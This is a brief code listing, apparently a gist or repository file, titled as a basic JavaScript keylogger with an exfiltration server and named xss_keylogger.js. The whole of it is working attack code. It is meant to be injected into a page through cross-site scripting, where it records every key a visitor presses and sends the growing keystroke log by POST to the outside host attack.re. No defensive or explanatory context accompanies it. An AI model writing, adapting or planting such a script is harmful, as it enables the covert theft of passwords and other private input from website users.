Basic JS keylogger with exfiltration server (HTTPS - POST)

xss_keylogger.js

let POST = function(url, params) {
  let http = new XMLHttpRequest();
  http.open('POST', url, true);
  http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
  http.send(params);
};

function logKey(e) {
  k += ` ${e.key}`;
  POST('https://attack.re', k);
}

var k=""
document.addEventListener('keydown', logKey);